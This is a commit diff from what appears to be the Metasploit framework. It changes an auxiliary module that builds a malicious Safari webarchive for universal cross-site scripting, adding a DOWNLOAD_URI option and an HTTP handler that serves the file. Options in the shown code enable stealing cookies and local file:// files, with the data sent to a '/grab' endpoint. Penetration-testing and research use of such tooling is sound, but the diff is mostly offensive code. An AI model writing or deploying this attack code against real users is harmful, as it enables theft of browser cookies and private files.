Skip to content

Commit 55e0ec3

Browse files
committed
Add support for DOWNLOAD_URI option.
* Fixes some comments that were no longer accurate. Conflicts: modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
1 parent 1d9a695 commit 55e0ec3

File tree

1 file changed

+28
-6
lines changed

1 file changed

+28
-6
lines changed

modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Lines changed: 28 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,7 @@ def initialize(info = {})
5050
OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']),
5151
OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http://browserscan.rapid7.com/)']),
5252
OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
53+
OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarchive.', '/msf.webarchive']),
5354
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
5455
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
5556
OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@@ -153,6 +154,20 @@ def start_http(opts={})
153154
@service_path = uopts['Path']
154155
@http_service.add_resource(uopts['Path'], uopts)
155156

157+
# Add path to download
158+
uopts = {
159+
'Proc' => Proc.new { |cli, req|
160+
resp = Rex::Proto::Http::Response::OK.new
161+
resp['Content-Type'] = 'application/x-webarchive'
162+
resp.body = @xml.to_s
163+
cli.send_response resp
164+
},
165+
'Path' => webarchive_download_url
166+
}.update(opts['Uri'] || {})
167+
@http_service.add_resource(webarchive_download_url, uopts)
168+
169+
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
170+
156171
# As long as we have the http_service object, we will keep the ftp server alive
157172
while @http_service
158173
select(nil, nil, nil, 1)
@@ -176,9 +191,10 @@ def on_request_uri(cli, request)
176191

177192
# @return [String] contents of webarchive as an XML document
178193
def webarchive_xml
179-
xml = webarchive_header
180-
urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
181-
xml << webarchive_footer
194+
return @xml if not @xml.nil? # only compute xml once
195+
@xml = webarchive_header
196+
urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
197+
@xml << webarchive_footer
182198
end
183199

184200
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +304,9 @@ def webarchive_footer
288304
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
289305
# [a encodeObject:response forKey:@"WebResourceResponse"];
290306
def web_response_xml(script)
291-
# this is a binary plist, but im too lazy to write a real encoder.
292-
# ripped this straight out of a safari webarchive save.
307+
# this is a serialized NSHTTPResponse, i'm too lazy to write a
308+
# real encoder so yay lets use string interpolation.
309+
# ripped this straight out of a webarchive save
293310
script['content-length'] = script[:body].length
294311
whitelist = %w(content-type content-length date etag
295312
Last-Modified cache-control expires)
@@ -711,7 +728,7 @@ def all_script_urls(pages)
711728
end
712729
end
713730

714-
# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
731+
# @return [Array<Array<Hash>>] list of headers returned by cacheable remote javascripts
715732
def find_cached_scripts
716733
cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
717734
begin
@@ -780,6 +797,11 @@ def backend_url
780797
"#{proto}://#{myhost}#{port_str}"
781798
end
782799

800+
# @return [String] URL that serves the malicious webarchive
801+
def webarchive_download_url
802+
@webarchive_download_url ||= datastore["DOWNLOAD_URI"]
803+
end
804+
783805
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
784806
# via the FILE_URLS module option.
785807
def interesting_file_urls

0 commit comments

Comments
 (0)